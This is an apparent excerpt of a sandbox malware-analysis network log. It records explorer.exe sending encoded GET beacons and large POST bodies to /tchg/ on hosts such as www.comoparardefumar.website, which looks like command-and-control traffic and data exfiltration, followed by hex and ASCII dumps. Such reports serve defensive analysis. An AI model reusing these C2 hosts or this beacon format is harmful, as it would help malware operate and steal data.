25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b
                                                                                                                    Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r[
                                                                                                                    May 30, 2023 11:13:04.587444067 CEST1721INData Raw: 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64
                                                                                                                    Data Ascii: ,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    91192.168.11.2049850183.90.238.4380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:06.595299006 CEST1721OUTGET /tchg/?O0qEM=oRufhoY+bc3ycM+VgiODBrp+vj6j24zBH4XRbixJn1DYBt5l7xCYw/uqkQ1xxa9R7WiXu6y4y7mJHWOjUCQ2GcjHOqMUPQqZlA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.dkansai-cp.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:13:06.880937099 CEST1723INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:13:05 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 2814
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Last-Modified: Mon, 02 Jul 2018 00:27:42 GMT
                                                                                                                    ETag: "afe-56ff9440f72fb"
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 37 70 78 3b 0a 7d 0a 70 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px; margin: 0; padding: 0; color: white;}
                                                                                                                    May 30, 2023 11:13:06.881012917 CEST1724INData Raw: 2e 65 78 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20
                                                                                                                    Data Ascii: .explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li { color: #666;}h3 { letter-spacing: 1px; f
                                                                                                                    May 30, 2023 11:13:06.881069899 CEST1725INData Raw: a4 bf a5 da a1 bc a5 b8 a4 cf b8 ab a4 c4 a4 ab a4 ea a4 de a4 bb a4 f3 a4 c7 a4 b7 a4 bf a1 a3 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 78 70 6c 61 69 6e 22 3e a4 b3 a4 ce a5 a8 a5 e9 a1 bc a4 cf a1 a2 bb d8 c4 ea a4 b7 a4
                                                                                                                    Data Ascii: </h2> <p class="explain"></p> <h3></h3> <div id="white_box"> <div id="cause"> <ul>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    92192.168.11.204985184.32.84.3280C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:11.917148113 CEST1726OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.comoparardefumar.website
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.comoparardefumar.website
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.comoparardefumar.website/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 37 35 62 76 39 62 61 59 75 68 35 6e 73 30 78 57 67 44 46 37 65 62 50 34 37 73 64 4c 4f 57 62 2d 39 4d 59 44 65 54 6d 4e 4d 71 34 56 32 63 30 38 50 4c 47 56 4b 67 49 36 46 37 31 62 7a 4c 64 56 30 5f 72 79 67 50 72 66 53 56 6c 5a 55 63 35 77 63 6e 4d 54 47 41 4b 49 72 6e 67 47 74 38 54 55 55 43 6f 61 77 64 58 56 4f 42 34 64 66 71 77 68 74 57 48 59 4d 4f 66 42 4d 6c 4f 58 58 74 69 36 47 49 7a 59 43 6f 66 31 48 6c 74 33 79 6c 41 79 4d 48 71 37 44 6b 57 6a 7a 59 30 2d 71 63 45 33 4c 74 6c 59 37 56 62 36 51 77 64 51 57 69 68 69 6d 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=75bv9baYuh5ns0xWgDF7ebP47sdLOWb-9MYDeTmNMq4V2c08PLGVKgI6F71bzLdV0_rygPrfSVlZUc5wcnMTGAKIrngGt8TUUCoawdXVOB4dfqwhtWHYMOfBMlOXXti6GIzYCof1Hlt3ylAyMHq7DkWjzY0-qcE3LtlY7Vb6QwdQWihimw).


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    93192.168.11.204985284.32.84.3280C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:14.463608980 CEST1727OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.comoparardefumar.website
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.comoparardefumar.website
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.comoparardefumar.website/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 37 35 62 76 39 62 61 59 75 68 35 6e 71 55 68 57 6d 6b 52 37 4f 4c 50 37 6e 38 64 4c 48 32 62 36 39 4d 55 44 65 53 54 4b 4d 34 63 56 31 39 45 38 65 5f 53 56 4a 67 49 36 4e 62 31 65 72 72 64 65 30 5f 6e 51 67 4e 28 66 53 56 78 5a 56 76 78 77 61 58 4d 51 65 77 4b 4a 38 58 67 46 70 38 54 65 55 46 67 73 77 66 72 56 4f 77 6b 64 65 76 45 68 70 48 48 58 62 65 66 44 45 46 4f 57 63 4e 69 4f 47 49 76 68 43 70 58 44 48 54 64 33 7a 46 67 79 50 48 71 36 61 45 57 75 73 6f 31 5f 71 38 46 54 4a 2d 56 37 69 32 33 6c 5a 43 34 38 63 7a 77 73 35 2d 73 6d 37 45 69 6d 43 61 57 34 36 6e 45 63 37 66 66 31 39 78 49 52 30 79 49 56 4c 49 78 61 69 4e 6e 63 4a 58 50 68 63 67 35 62 74 34 33 56 4c 53 39 7a 62 5a 58 71 6d 59 7a 72 32 46 5a 62 46 38 54 62 6f 32 32 70 7e 49 53 74 4a 54 52 37 73 44 72 57 33 63 4a 6d 57 4a 4b 38 44 78 6a 72 50 74 62 6c 62 52 78 67 6f 6f 69 62 7a 44 45 45 49 63 35 5a 52 48 32 43 66 4f 67 38 4d 38 31 6e 6d 7a 37 47 5a 36 6f 38 48 68 78 46 52 4c 51 64 4f 59 73 49 35 51 4b 63 4b 53 59 4f 57 6f 38 4a 56 31 42 36 68 35 49 32 72 6a 6a 4a 57 55 56 4d 35 58 77 71 68 39 4e 39 48 6d 6e 48 7a 41 6a 4f 75 55 45 43 35 5a 42 67 79 43 74 47 56 38 6e 53 7e 35 30 41 6e 51 39 58 69 58 51 53 45 38 48 63 55 75 50 34 50 48 65 57 6a 44 30 61 35 30 52 73 65 54 28 30 49 50 42 61 6a 65 5a 49 73 72 43 43 51 49 6f 39 72 53 4b 6d 4f 37 41 69 59 54 78 4b 69 47 33 57 58 34 6e 43 30 4f 43 37 31 62 38 47 39 55 64 69 72 50 66 57 6b 66 52 4b 42 45 4e 65 53 71 42 48 63 6a 32 38 6b 4a 6a 47 28 46 6c 6a 6b 6a 41 6b 7a 67 49 37 78 77 46 51 67 6b 6d 57 44 63 78 35 77 61 34 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=75bv9baYuh5nqUhWmkR7OLP7n8dLH2b69MUDeSTKM4cV19E8e_SVJgI6Nb1errde0_nQgN(fSVxZVvxwaXMQewKJ8XgFp8TeUFgswfrVOwkdevEhpHHXbefDEFOWcNiOGIvhCpXDHTd3zFgyPHq6aEWuso1_q8FTJ-V7i23lZC48czws5-sm7EimCaW46nEc7ff19xIR0yIVLIxaiNncJXPhcg5bt43VLS9zbZXqmYzr2FZbF8Tbo22p~IStJTR7sDrW3cJmWJK8DxjrPtblbRxgooibzDEEIc5ZRH2CfOg8M81nmz7GZ6o8HhxFRLQdOYsI5QKcKSYOWo8JV1B6h5I2rjjJWUVM5Xwqh9N9HmnHzAjOuUEC5ZBgyCtGV8nS~50AnQ9XiXQSE8HcUuP4PHeWjD0a50RseT(0IPBajeZIsrCCQIo9rSKmO7AiYTxKiG3WX4nC0OC71b8G9UdirPfWkfRKBENeSqBHcj28kJjG(FljkjAkzgI7xwFQgkmWDcx5wa4.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    94192.168.11.204985384.32.84.3280C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:17.009413958 CEST1730OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.comoparardefumar.website
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.comoparardefumar.website
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.comoparardefumar.website/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 37 35 62 76 39 62 61 59 75 68 35 6e 71 55 68 57 6d 6b 52 37 4f 4c 50 37 6e 38 64 4c 48 32 62 36 39 4d 55 44 65 53 54 4b 4d 34 55 56 31 50 67 38 50 6f 7e 56 49 67 49 36 4f 62 31 6c 72 72 64 50 30 38 58 55 67 4e 7a 50 53 57 4a 5a 56 38 4a 77 61 6c 55 51 62 77 4b 4b 77 33 67 48 74 38 54 4b 55 43 6f 6a 77 66 28 76 4f 42 67 64 66 76 30 68 74 30 76 59 44 65 66 42 45 46 50 58 59 4e 69 47 47 49 37 71 43 70 62 44 48 52 5a 33 79 33 59 79 4f 51 7e 36 4f 45 57 76 6d 49 31 73 6a 63 46 6d 4a 2d 42 46 69 32 33 66 5a 42 30 38 63 7a 51 73 34 34 6b 6c 37 6b 69 6d 42 61 57 37 7e 6e 41 51 37 66 7a 39 39 79 55 52 30 30 6f 56 4c 6f 78 61 6e 76 50 66 65 48 50 37 4f 51 35 49 37 49 37 4e 4c 53 34 4b 62 59 7a 71 6d 49 6e 72 32 30 5a 62 41 59 50 62 33 6d 32 72 78 6f 53 2d 66 6a 52 5f 73 44 62 38 33 64 70 32 57 4f 4b 38 44 54 72 72 5a 34 6e 69 5a 78 78 6d 6b 49 6a 50 69 54 49 59 49 59 64 46 52 48 32 53 66 4b 59 38 4c 50 74 6e 68 32 50 5a 61 71 6f 5f 53 52 78 51 47 62 63 70 4f 63 30 41 35 54 61 79 4b 52 30 4f 58 49 38 4a 51 55 42 31 72 4a 49 78 6b 44 69 51 4c 45 55 54 35 58 74 44 68 38 34 4b 48 57 44 48 7a 77 7a 4f 72 45 45 46 38 35 42 6b 6b 79 74 45 65 63 6e 53 7e 35 34 2d 6e 51 78 58 69 6c 41 53 45 4c 37 63 66 5a 54 34 4e 48 65 59 6a 44 31 65 35 30 4e 32 65 51 66 4b 49 50 78 77 6a 63 56 49 69 61 53 43 54 4d 38 69 75 69 4b 6a 4b 37 41 78 57 7a 74 52 69 47 72 4f 58 34 58 38 30 38 57 37 30 62 4d 47 35 55 64 74 67 50 65 65 6a 66 51 53 46 45 77 64 53 73 6c 74 63 6a 79 73 6b 4c 54 47 75 41 35 36 7a 42 45 59 71 6a 30 36 37 6e 68 64 7e 58 65 71 5a 65 4e 79 6d 50 32 45 79 30 34 33 4b 53 76 7a 38 44 37 38 6b 34 35 4c 6f 65 4f 5a 4f 43 28 6b 73 68 39 76 78 78 51 34 74 42 66 6c 5a 75 57 72 61 2d 51 52 73 33 5a 51 62 44 39 6d 6c 37 6a 75 65 56 44 62 28 67 4c 67 45 58 79 69 55 56 6e 38 7e 74 79 32 33 73 7e 43 6a 71 79 52 64 32 4c 75 57 78 66 4e 6b 75 77 5f 34 5f 7a 44 52 4d 52 4a 34 34 74 7a 4b 75 78 69 4f 51 5a 58 33 52 4a 65 30 33 78 70 41 34 52 77 41 78 74 44 4c 47 6a 62 58 64 75 34 73 4a 45 45 58 4d 59 78 54 4a 45 6e 55 47 4c 39 70 37 7a 76 73 47 59 49 66 62 75 75 56 53 75 65 54 77 73 6d 6d 7a 32 65 4c 77 52 56 32 74 79 30 37 65 6c 43 46 57 41 46 73 51 7a 48 79 4a 6e 44 64 71 63 62 77 63 72 50 36 41 59 68 59 4f 52 47 63 45 64 54 36 4a 48 6d 7a 78 55 78 57 6c 45 6c 38 65 37 67 43 69 63 62 4b 51 51 6c 53 31 36 33 77 76 59 43 44 43 35 77 62 44 67 57 69 53 28 5f 72 66 56 42 7a 76 37 67 33 48 45 48 78 50 4b 41 48 52 71 62 54 57 30 35 59 39 70 4d 59 74 55 51 67 57 70 31 53 32 56 41 4d 32 72 65 77 64 4b 35 51 64 74 6b 71 78 4a 43 68 77 38 62 57 53 56 47 55 78 78 30 61 59 64 75 6d 6d 47 4b 51 50 38 55 77 34 66 57 58 4f 77 36 5a 65 50 71 73 65 78 44 37 56 35 47 61 6e 37 39 32 6c 69 67 42 5a 4b 67 53 59 43 44 30 53 67 44 77 33 41 65 74 6d 62 42 6a 31 7e 41 66 5a 42 4f 4a 79 41 50 28 39 51 6e 48 41 67 76 63 7a 31 66 4d 33 45 76 49 47 54 6b 43 50 7a 68 37 4f 6f 33 5a 4b 4a 44 48 4c 79 53 39 63 37 74 4b 56 5a 32 70 4c 57 63 73 61 73 43 33 67 62 75 52 52 67 65 6f 64 68 6f 79 4c 70 33 4a 37 63 48 54 4d 64 71 31 67 70 31 61 64 31 48 56 59 56 6e 47 54 7e 31 4d 66 6c 6a 57 4b 34 44 73 66 33 63 54 77 61 66 72 69 53 73 42 51 4b 6e 43 36 58 6e 4a 69 37 4c 54 33 51 61 71 42 31 42 72 36 61 59 68 61 54 4f 43 4b 6b 31 57 54 7a 4b 62 63 66 38 6c 39 39 74 4a 57 66 45 42 77 4c 74 46 4c 61 71 57 30 37 4d 42 44 71 61 72 37 4e 50 28 44 37 35 75 62 7e 78 6b 53 6d 39 67 6a 54 59 49 51 38 4d 34 39 68 71 4b 78 74 43 54 4a 4e 37 79 58 55 54 47 39 68 5f 54 6c 43 4d 73 64 4f 43 53 67 6f 32 33 69 4f 66 4e 4f 45 52 34 56 73 49 56 39 44 55 67 72 75 64 74 6a 62 61 77 73 5a 49 39 30 75 6f 6c 61 61 54 6a 46 55 72 37 66 47 76 6d 51 76 50 4c 43 6d 64 37 4f 63 35 49 43 64 36 76 73 45 68 41 67 63 30 4c 77 66 78 51 73 4c 76 63 78 64 72 34 57 55 6d 52 62 48 6d 35 7a 53 53 43 75 59 5a 74 49 42 52 50 32 7e 48 46 52 33 69 73 41 4f 4f 4e 62 75 46 33 4e 35 72 36 59 66 51 65 68 53 43 4a 34 53 33 46 38 74 44 4f 4e 74 31 59 6a 76 33 7e 49 5a 52 36 42 48 4f 35 5f 5a 6c 71 5a 28 71 78 69 57 71 65 6c 43 4f 6c 69 4f 54 46 72 79 2d 6a 73 6b 67 32 64 31 43 57 69 63 43 43 34 55 50 6b 55 79 33 69
                                                                                                                    Data Ascii: O0qEM=75bv9baYuh5nqUhWmkR7OLP7n8dLH2b69MUDeSTKM4UV1Pg8Po~VIgI6Ob1lrrdP08XUgNzPSWJZV8JwalUQbwKKw3gHt8TKUCojwf(vOBgdfv0ht0vYDefBEFPXYNiGGI7qCpbDHRZ3y3YyOQ~6OEWvmI1sjcFmJ-BFi23fZB08czQs44kl7kimBaW7~nAQ7fz99yUR00oVLoxanvPfeHP7OQ5I7I7NLS4KbYzqmInr20ZbAYPb3m2rxoS-fjR_sDb83dp2WOK8DTrrZ4niZxxmkIjPiTIYIYdFRH2SfKY8LPtnh2PZaqo_SRxQGbcpOc0A5TayKR0OXI8JQUB1rJIxkDiQLEUT5XtDh84KHWDHzwzOrEEF85BkkytEecnS~54-nQxXilASEL7cfZT4NHeYjD1e50N2eQfKIPxwjcVIiaSCTM8iuiKjK7AxWztRiGrOX4X808W70bMG5UdtgPeejfQSFEwdSsltcjyskLTGuA56zBEYqj067nhd~XeqZeNymP2Ey043KSvz8D78k45LoeOZOC(ksh9vxxQ4tBflZuWra-QRs3ZQbD9ml7jueVDb(gLgEXyiUVn8~ty23s~CjqyRd2LuWxfNkuw_4_zDRMRJ44tzKuxiOQZX3RJe03xpA4RwAxtDLGjbXdu4sJEEXMYxTJEnUGL9p7zvsGYIfbuuVSueTwsmmz2eLwRV2ty07elCFWAFsQzHyJnDdqcbwcrP6AYhYORGcEdT6JHmzxUxWlEl8e7gCicbKQQlS163wvYCDC5wbDgWiS(_rfVBzv7g3HEHxPKAHRqbTW05Y9pMYtUQgWp1S2VAM2rewdK5QdtkqxJChw8bWSVGUxx0aYdummGKQP8Uw4fWXOw6ZePqsexD7V5Gan792ligBZKgSYCD0SgDw3AetmbBj1~AfZBOJyAP(9QnHAgvcz1fM3EvIGTkCPzh7Oo3ZKJDHLyS9c7tKVZ2pLWcsasC3gbuRRgeodhoyLp3J7cHTMdq1gp1ad1HVYVnGT~1MfljWK4Dsf3cTwafriSsBQKnC6XnJi7LT3QaqB1Br6aYhaTOCKk1WTzKbcf8l99tJWfEBwLtFLaqW07MBDqar7NP(D75ub~xkSm9gjTYIQ8M49hqKxtCTJN7yXUTG9h_TlCMsdOCSgo23iOfNOER4VsIV9DUgrudtjbawsZI90uolaaTjFUr7fGvmQvPLCmd7Oc5ICd6vsEhAgc0LwfxQsLvcxdr4WUmRbHm5zSSCuYZtIBRP2~HFR3isAOONbuF3N5r6YfQehSCJ4S3F8tDONt1Yjv3~IZR6BHO5_ZlqZ(qxiWqelCOliOTFry-jskg2d1CWicCC4UPkUy3i8q1zO1dYG7S9MOYJyVcRESI~wIKS9ZHGSuVhiLR4Cw63z1ozAnPSOnYqRkaXHdHrFkJagRiea3CT8wwUv4tIdrrIIFnipvUMaecIh8qn-UVk5QXTuEzg2CtihWCG240pl2n2XKtOpbwOQfIyTZV0SJWR6nx93z76y39HpOUGBX75-JblzhIrEaXfNW7PQj1Lqt63srbAHsHEhoTDUY5c2vhXA2_BEEy4S4T5aMprqd-1ZYNBFkBJ8S8bP15XQ33vMwQUcZBg42QdhH2tDYu5w~7SzEjs3vPuqXkZt(oTBJciM3QbjaQm7PhfxAazC5iIy8pG2qLUPekmw8wpibWNFPisrSjeRAc~7lge0Us687Q0FHI1OIgLYoK2oFAUzB4GnxJTMd2GwZa(R(ePDBcUHkBsv32~hw5o8B2Xa18u92eWAFbGex4JN8jV8d6uTwrlwNEQ8jbvztmT1aWh33ZNxwbQXThcYYWSaq_hckulqzjE0u-J_v1abG5b8m0kU4DblD6BzoP41vu1RFln7HaOUEWiWQIUSW6hL0F6L~SXVnyi9z6h1ueX9S7vCJO4S1EhZhGKDTEnvSlinGySzO1OsXHeYcPWd0mwL(0vPMsQTfN0_RLqskvXy2XrNCPfFIeckxrt7fWldHCf9X71StbLbo4oZIBeXxc9NentnTvXd4GpIcvLYJ1ZWG5u_Z14AgdFFy5xmLxTq92(1lnWMyEoOfnZU02m7QngCNo4XXBDs3qIj55d5s81lizWfPFbHhbctwduYb1YONF
                                                                                                                    May 30, 2023 11:13:17.009474039 CEST1740OUTData Raw: 38 4a 33 6a 52 39 58 79 39 6e 70 61 55 45 75 2d 39 35 33 74 75 74 6d 36 68 72 5a 56 7e 33 62 76 38 73 58 55 77 5a 57 38 48 4d 51 41 61 55 78 73 37 37 72 63 41 39 59 66 79 64 69 5a 58 77 43 6c 78 4e 34 58 38 2d 49 6c 71 62 78 36 6e 48 4f 75 39 44
                                                                                                                    Data Ascii: 8J3jR9Xy9npaUEu-953tutm6hrZV~3bv8sXUwZW8HMQAaUxs77rcA9YfydiZXwClxN4X8-Ilqbx6nHOu9DaGLNmSJbKAn-J0codRw2YBXDhVfrdkW1Ve7Dt7H1FUd1ve~NHEgE~VwPeZtAwUBAAny_ptse(aYwooNpW1b0KjPaATTDzg1VImijEadV9qLFocAORNuFNP32epjk8D5VeTeFYiolaWQQLtE5NRzPXoz0FDx_skc2J
